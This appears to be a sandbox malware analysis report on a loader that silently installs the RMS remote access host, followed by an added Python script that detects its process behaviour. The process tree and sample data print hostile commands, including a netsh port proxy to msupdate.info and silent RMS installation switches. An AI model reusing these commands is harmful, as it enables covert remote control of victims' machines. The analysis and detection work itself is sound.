Resubmissions

29-12-2021 11:50

211229-nz3vsaddbl 8

29-12-2021 11:29

211229-nlssnaddak 10

28-12-2021 17:00

211228-vh1sescfan 10

Analysis

  • max time kernel
    143s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-12-2021 17:00

General

  • Target

    tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe

  • Size

    397KB

  • MD5

    aff57ee1a4f3731c2036046910f78fb4

  • SHA1

    ef9627c0cadff85a3dfaab6aef0b7c885f03b186

  • SHA256

    3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

  • SHA512

    5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by the Russian company TektonIT. It is a legitimate commercial product, but an unattended, silent installation of its host component, as seen in this run, is the usual way it is abused as a remote access trojan.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • Modifies powershell logging option 1 TTPs
  • Drops file in Program Files directory 53 IoCs
  • Drops file in Windows directory 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but in this run the drive enumeration is attributed to msiexec.exe (PID 2044) while it installs the RMS host MSI; no encryption activity is reported.

  • Gathers network information 2 TTPs 6 IoCs

    Uses command-line utilities (NETSTAT.EXE -na and netsh interface portproxy show all, each run several times by the loader) to view network configuration.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
    1⤵
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ywmv_yex.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES530.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC510.tmp"
        3⤵
          PID:576
      • C:\Windows\system32\chcp.com
        "C:\Windows\system32\chcp.com" 437
        2⤵
          PID:1456
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy show all
          2⤵
            PID:648
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:756
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1636
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:912
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" interface portproxy reset
            2⤵
              PID:2024
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" interface portproxy show all
              2⤵
                PID:1364
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
                2⤵
                  PID:924
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                  2⤵
                    PID:1932
                  • C:\Windows\system32\netsh.exe
                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                    2⤵
                      PID:1740
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1520
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1608
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1616
                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
                      "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1556
                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
                        3⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1692
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
                          4⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1504
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
                          4⤵
                            PID:1068
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1444
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Blocklisted process makes network request
                      • Enumerates connected drives
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2044
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding F8B60EFCC21853C0C6C4D7B689851286
                        2⤵
                        • Loads dropped DLL
                        PID:1188
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:884
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1448
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1748
                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                      "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:1892
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                        2⤵
                        • Executes dropped EXE
                        PID:460
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1608
                        • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                          "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: SetClipboardViewer
                          PID:1756
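The process tree above carries four high-signal events: csc.exe compiling a C# source from a response file in the user's Temp directory with the loader as its parent, netsh adding a v4tov4 port proxy from local port 757 to msupdate.info:443, msiexec silently (/qn) installing rms.host6.3ru_mod.msi out of the 7-Zip SFX extraction directory, and rutserv.exe being driven through /silentinstall, /firewall and /start. The Python below is an added example and is not part of the sandbox report or of RMS: it replays those command lines as constructed process-creation events (PIDs copied from the tree; parent PIDs the report does not show are set to 0) and flags each of the four patterns, parsing the portproxy arguments so the redirect target can be extracted for blocking. The rule names and the list of user-writable directories are my assumptions.

```python
"""Triage the loader's process tree (added example, not the report's code).
Events are constructed from the tree above; ppid 0 = parent not in the report."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Pattern-match the raw command line; shlex mangles Windows paths, so avoid it.
PORTPROXY_ADD = re.compile(r"\binterface\s+portproxy\s+add\s+(?P<mode>v[46]tov[46])\b(?P<args>.*)", re.I)
PORTPROXY_KV = re.compile(r"(listenport|listenaddress|connectport|connectaddress)\s*=\s*(\S+)", re.I)
MSI_INSTALL = re.compile(r"(?:^|\s)/i\s+\"?(?P<msi>[^\"]+?\.msi)\"?(?=\s|$)", re.I)
MSI_QUIET = re.compile(r"(?:^|\s)/(?:qn|quiet|qb)\b", re.I)
CSC_RESPONSE = re.compile(r"@\"?(?P<rsp>[^\"\s]+\.cmdline)\"?", re.I)
# Assumed set of user-writable locations a compiler or installer should not be fed from.
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)\\", re.I)
RMS_INSTALL_SWITCHES = {"/silentinstall", "/firewall", "/start"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_portproxy_add(cmdline: str) -> dict | None:
    """Return the key=value arguments of 'netsh interface portproxy add', else None."""
    m = PORTPROXY_ADD.search(cmdline)
    if not m:
        return None
    kv = {k.lower(): v.strip('"') for k, v in PORTPROXY_KV.findall(m.group("args"))}
    kv["mode"] = m.group("mode").lower()
    return kv


def triage(events: list[ProcEvent]) -> list[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        if name == "netsh.exe" and (pp := parse_portproxy_add(e.cmdline)):
            findings.append(Finding("portproxy_add", e.pid,
                f"{pp['mode']} {pp.get('listenport')} -> {pp.get('connectaddress')}:{pp.get('connectport')}"))
        elif name == "csc.exe" and (m := CSC_RESPONSE.search(e.cmdline)):
            # Runtime compile from %TEMP% whose parent also lives in a user-writable path
            # (an unknown parent is treated as untrusted).
            rsp = m.group("rsp")
            if USER_WRITABLE.search(rsp) and (parent is None or USER_WRITABLE.search(parent.image)):
                findings.append(Finding("runtime_csharp_compile", e.pid,
                    f"{rsp} compiled for {parent.image if parent else '<unknown parent>'}"))
        elif name == "msiexec.exe" and (m := MSI_INSTALL.search(e.cmdline)):
            msi = m.group("msi")
            if MSI_QUIET.search(e.cmdline) and USER_WRITABLE.search(msi):
                findings.append(Finding("silent_msi_from_user_path", e.pid, msi))
        elif name == "rutserv.exe":
            switches = {t.lower() for t in e.cmdline.split() if t.startswith("/")}
            if switches & RMS_INSTALL_SWITCHES:
                findings.append(Finding("rms_host_install", e.pid, " ".join(sorted(switches))))
    return findings


# Constructed sample: command lines transcribed from the process tree above.
LOADER = r"C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"
NETSH = r"C:\Windows\system32\netsh.exe"
RMS_DIR = r"C:\Program Files (x86)\Remote Manipulator System - Host"
SAMPLE_EVENTS = [
    ProcEvent(1724, 0, LOADER, f'"{LOADER}"'),
    ProcEvent(1372, 1724, CSC, f'"{CSC}" /noconfig /fullpaths @"C:\\Users\\Admin\\AppData\\Local\\Temp\\ywmv_yex.cmdline"'),
    ProcEvent(648, 1724, NETSH, f'"{NETSH}" interface portproxy show all'),
    ProcEvent(756, 1724, r"C:\Windows\system32\NETSTAT.EXE", r'"C:\Windows\system32\NETSTAT.EXE" -na'),
    ProcEvent(2024, 1724, NETSH, f'"{NETSH}" interface portproxy reset'),
    ProcEvent(924, 1724, NETSH, f'"{NETSH}" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info'),
    ProcEvent(1556, 1724, r"C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe", r'"C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"'),
    ProcEvent(1692, 1556, r"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup'),
    ProcEvent(1504, 1692, r"C:\Windows\SysWOW64\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn'),
    ProcEvent(2044, 0, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(884, 2044, RMS_DIR + r"\rutserv.exe", f'"{RMS_DIR}\\rutserv.exe" /silentinstall'),
    ProcEvent(1448, 2044, RMS_DIR + r"\rutserv.exe", f'"{RMS_DIR}\\rutserv.exe" /firewall'),
    ProcEvent(1748, 2044, RMS_DIR + r"\rutserv.exe", f'"{RMS_DIR}\\rutserv.exe" /start'),
    ProcEvent(1892, 0, RMS_DIR + r"\rutserv.exe", f'"{RMS_DIR}\\rutserv.exe"'),
    ProcEvent(460, 1892, RMS_DIR + r"\rfusclient.exe", f'"{RMS_DIR}\\rfusclient.exe" /tray'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:26} pid={f.pid:<5} {f.detail}")
```

Feed it process-creation events from an EDR in the same shape. A portproxy entry outlives the netsh process under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, so a host that produces the portproxy_add finding should also have that key audited; `netsh interface portproxy reset`, which the loader itself runs before adding its own entry, clears it.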

                    Network

                    MITRE ATT&CK Enterprise v6

                    Downloads

                    • C:\Program Files (x86)\Remote Manipulator System - Host\English.lg

                      MD5

                      bc25377ade68750b834c81fa71c233b8

                      SHA1

                      84dbb465dd2125f47668e2508e18af9bd6db2fd8

                      SHA256

                      9a48a7ea7ba2c2f33280d1e1722ebbc59bf81bc6c5a1f97edca53ea641ffd8e3

                      SHA512

                      205ab195339d7108adbe6dfabd48e4e21c5956ded587d7213a44618f0d34a43f7b8abaa7765b9d31695efacfc44beeb69fbaa3cb27c141b6a653713fdf5ebce5

                    • C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll

                      MD5

                      2ddfa39f5c2fd3f00681ef2970617e4b

                      SHA1

                      8152aa18afbacf398b92168995ec8696d3fe3659

                      SHA256

                      f938bdc741ef1d2738b532aef001a160e3a3627ed8a27158b7017ee49fc65791

                      SHA512

                      f89f0f02cda650c138e4ebaef198f0762dfd571ef7d46a6b3710cd93d76bc52a79055c55afca46128a9a84a795a5cb946ca93c492e07cfb503c9b27d96211e20

                    • C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll

                      MD5

                      3d0b27b3f8aa22575aa0faf0b2d67216

                      SHA1

                      39fc787538849692ed7352418616f467b7a86a1d

                      SHA256

                      d7782488ef29bf0fd7e8faf0bd24414a6540bf7366434692a5a485d5ae2d7d44

                      SHA512

                      19f0785d3cecce0dbbb7da1be640bffebe4daedc65a513d1db0b5e533eb96aaa0588831de74c88e5013c00405e03ca4188c4b633e39e6c49ab5c1d1b42191ca8

                    • C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg

                      MD5

                      e44e34bc285b709f08f967325d9c8be1

                      SHA1

                      e73f05c6a980ec9d006930c5343955f89579b409

                      SHA256

                      1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

                      SHA512

                      576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll

                      MD5

                      292a1748850d1fdc91d4ec23b02d6902

                      SHA1

                      8f15f1c24e11c0b45b19c82a78f7b79b1e7f932d

                      SHA256

                      acf354ad6ed94e876b29a60c5870dd91e7b3f76cc82c1a862c92024a12404a9f

                      SHA512

                      cf7579f1169ec21d9bf3c666d416d3fe2a4f9953d4d328b182452e40043f91055d301fd4b4a21454b847dbdb0af6a61c52657caded7d6fd7e88812aceeacf704

                    • C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll

                      MD5

                      4570f7a40357016c97afe0dd4faf749b

                      SHA1

                      ebc8a1660f1103c655559caab3a70ec23ca187f1

                      SHA256

                      a5f008bf852d4c73e001f840d6f8b233c7d9bc9570cee639d40c1c8723bf99f8

                      SHA512

                      6b16979d004adc04259f2ce043cde6f7b57f2ddf5f4cea7bb390fd6b9fb273d22355b837f1b5c2eae77ea7df792de8e6db43e31d7246f044935a8187dace493b

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll

                      MD5

                      038bf9f3a58560ad1130eeb85cdc1a87

                      SHA1

                      3571eb7293a2a3a5bf6eb21e1569cd151d995d1a

                      SHA256

                      d247afa3bd1ccc18e11eb099280802a61d3792a2018c476d95debf2091e9707d

                      SHA512

                      8ffa52b358841600b9122974079d22d4e11bc4214316cd85ac4d4af0e369112b6827029f74a9a9d3918db00c7fed3a9a1985e0b43da39783a748d78752ae2385

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll

                      MD5

                      eeb2c52abbc7eb1c029b7fec45a7f22e

                      SHA1

                      8bfeb412614e3db0a2bf0122f4d68cc27b8c3a61

                      SHA256

                      c0f0b84d587066af8f80f41a7be63b4c01547af3f1e011602ac1b6ee0ac54a2c

                      SHA512

                      0b5b83335c6f602b8397a3c2ae6d1e661d744eb27114463d53e344bf18774ccb38853d314ebe05536d4c28c29fe3fdaba041a6a46983789f064ca70881cfcb85

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll

                      MD5

                      e38372f576d927f525ef8e1a34b54664

                      SHA1

                      26af9d1db0a3f91d7fe13147e55f06c302d59389

                      SHA256

                      4046bd0b93909a41d0fd96f0405a864c79a47f493165546569251c1f73db6b0b

                      SHA512

                      78b7477b000407990304ec37624b873514d4ed9daa1b42fd988707b7374ffab442ba28fe19884724867f3f0f7a5f12f7fc8c228c050115c902d1569e4a3b13c7

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      MD5

                      1e91f39181acab3d76d4263180872ded

                      SHA1

                      f40ad03c27e686ba13a4894009dd1fed46256fd0

                      SHA256

                      215ac6443b23506515d4e92e3046a9ca16b1deb270b691c59ad5ce437688c687

                      SHA512

                      b6953f4221158f6280a791e683d04e70c77d59f5cc941636fb5924f6ade7ed7afacb66e785e80fe11e762743ae6889e75c165d91bc49b00b65430f9063a6c56e

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi

                      MD5

                      73e578a44265558d3ace212869d43cbb

                      SHA1

                      d2c15578def8996ed0ae4a44754055b774b095a7

                      SHA256

                      8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

                      SHA512

                      fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

                    • C:\Users\Admin\AppData\Local\Temp\RES530.tmp

                      MD5

                      7ed52c78db24b22d54634fca7048ddd2

                      SHA1

                      33cf078827b37ea77119869455b6b44110e59faf

                      SHA256

                      a21cbe5eadd992c386853cd688cb734204c1a26784cde81dff2be010f25d4057

                      SHA512

                      2da2e58cfe083162ab139737f89704624f76bf6d5f8a5f6cd907a17b74a37712896b141ac3aa7849de2cb92be13a96eca698eed2d850b01368003d04b5a5c2a4

                    • C:\Users\Admin\AppData\Local\Temp\killself.bat

                      MD5

                      c2ac85b000427a4a00f19da237aaaf86

                      SHA1

                      459ecb5e64576348e6c654724e87825772c06ea8

                      SHA256

                      b5157eceaf9b5f6448d15dcfe7011af0b44a4288f7667c5d717f042c2fba1352

                      SHA512

                      e62f711445398b0654e698c4f7d4c75bb8693e901ae99f1cf543f45ccd9532daf27bba1ceb9d180d0379a41c9a62d6ee2df30cd25b9abb05532c551a0fad814b

                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                      MD5

                      73f351beae5c881fafe36f42cde9a47c

                      SHA1

                      dc1425cfd5569bd59f5d56432df875b59da9300b

                      SHA256

                      a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                      SHA512

                      f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                    • C:\Users\Admin\AppData\Local\Temp\ywmv_yex.dll

                      MD5

                      3b65fe8518ee80a217b6a97971c38073

                      SHA1

                      1c1e9ed201699c827d7db91b8444b8229ffc6c77

                      SHA256

                      828eb265e25499403e8c38bff1bb62b5f8ca4d84ebf53a88dbd14459b6ec97e1

                      SHA512

                      9a58941714093c350c3eb72738dfe83711a3838cab9cb3002d990ad73f43539606ee3ec298e45f09b7e0e1d67ce7e08314b84fa172a8e12d6e30ea194fe9b86a

                    • C:\Users\Admin\AppData\Local\Temp\ywmv_yex.pdb

                      MD5

                      06c78f76197d29b14c0ba54ac7fd7cd4

                      SHA1

                      bbd48be919f7da7035567e5fa16aed78de63aaac

                      SHA256

                      9c183bd8e5beff5f148c81e735d0e859205dc54a65428ee3c74af143c391505f

                      SHA512

                      98933003e9ae03f94e535d418a4b7d1f835fb8629f1f8a9b5697a44a16e7394c1ca556e00a0b49162f84fa3e1601170c09949785af0d01ac5ff0fa189a45fba8

                    • \??\c:\Users\Admin\AppData\Local\Temp\CSC510.tmp

                      MD5

                      b624b41c38aa93de574d413b6f652efc

                      SHA1

                      007a0c0df6183909fbe02ad63291d4ee171d9b1d

                      SHA256

                      8ed3350ffa75c060005da129574e600dfab9a55dcca5ddb36f622a32817e811c

                      SHA512

                      1abe4d804ede9fecada3971bc01bd977c3b4b3bfa3a1b45ecd13e7318942aa8c5bdbce738980fe9d2882d6852cc2260c77bd5c6de317b5c8b3071b5285dce399

                    • \??\c:\Users\Admin\AppData\Local\Temp\ywmv_yex.0.cs

                      MD5

                      1640a04633fee0dfdc7e22c4f4063bf6

                      SHA1

                      3cb525c47b5dd37f8ee45b034c9452265fba5476

                      SHA256

                      55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

                      SHA512

                      85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

                    • \??\c:\Users\Admin\AppData\Local\Temp\ywmv_yex.cmdline

                      MD5

                      b3c2b8f2b705a708aa5d72ad3284eb7b

                      SHA1

                      358c8e4a38901bd9e6d42f748b667957766b7c99

                      SHA256

                      7548821ba5c9c7004fb8a8c700667a09804957630e00d3af1eb802357fc6e83f

                      SHA512

                      ce4343beb92a1d3413a671903c159f49354b3e2aca12835fcbc7c68ac7eadd1a678a69d9894e4e563ae51d10b4ac2be1d932971c4b761d7df96d6082b12a69ec

                    • \Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • \Windows\Installer\MSIFA8F.tmp

                      MD5

                      b0bcc622f1fff0eec99e487fa1a4ddd9

                      SHA1

                      49aa392454bd5869fa23794196aedc38e8eea6f5

                      SHA256

                      b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

                      SHA512

                      1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

                    • memory/460-142-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/460-137-0x0000000000000000-mapping.dmp

                    • memory/576-62-0x0000000000000000-mapping.dmp

                    • memory/648-69-0x0000000000000000-mapping.dmp

                    • memory/756-71-0x0000000000000000-mapping.dmp

                    • memory/884-113-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/884-106-0x0000000000000000-mapping.dmp

                    • memory/912-73-0x0000000000000000-mapping.dmp

                    • memory/924-78-0x0000000000000000-mapping.dmp

                    • memory/1068-120-0x0000000000000000-mapping.dmp

                    • memory/1188-104-0x0000000000000000-mapping.dmp

                    • memory/1364-76-0x0000000000000000-mapping.dmp

                    • memory/1372-58-0x0000000000000000-mapping.dmp

                    • memory/1372-61-0x00000000020A0000-0x00000000020A2000-memory.dmp

                      Filesize

                      8KB

                    • memory/1444-68-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

                      Filesize

                      8KB

                    • memory/1448-114-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1448-110-0x0000000000000000-mapping.dmp

                    • memory/1456-67-0x0000000000000000-mapping.dmp

                    • memory/1504-100-0x0000000000000000-mapping.dmp

                    • memory/1520-84-0x0000000000000000-mapping.dmp

                    • memory/1556-91-0x0000000075B11000-0x0000000075B13000-memory.dmp

                      Filesize

                      8KB

                    • memory/1556-89-0x0000000000000000-mapping.dmp

                    • memory/1608-143-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1608-85-0x0000000000000000-mapping.dmp

                    • memory/1608-136-0x0000000000000000-mapping.dmp

                    • memory/1616-86-0x0000000000000000-mapping.dmp

                    • memory/1636-72-0x0000000000000000-mapping.dmp

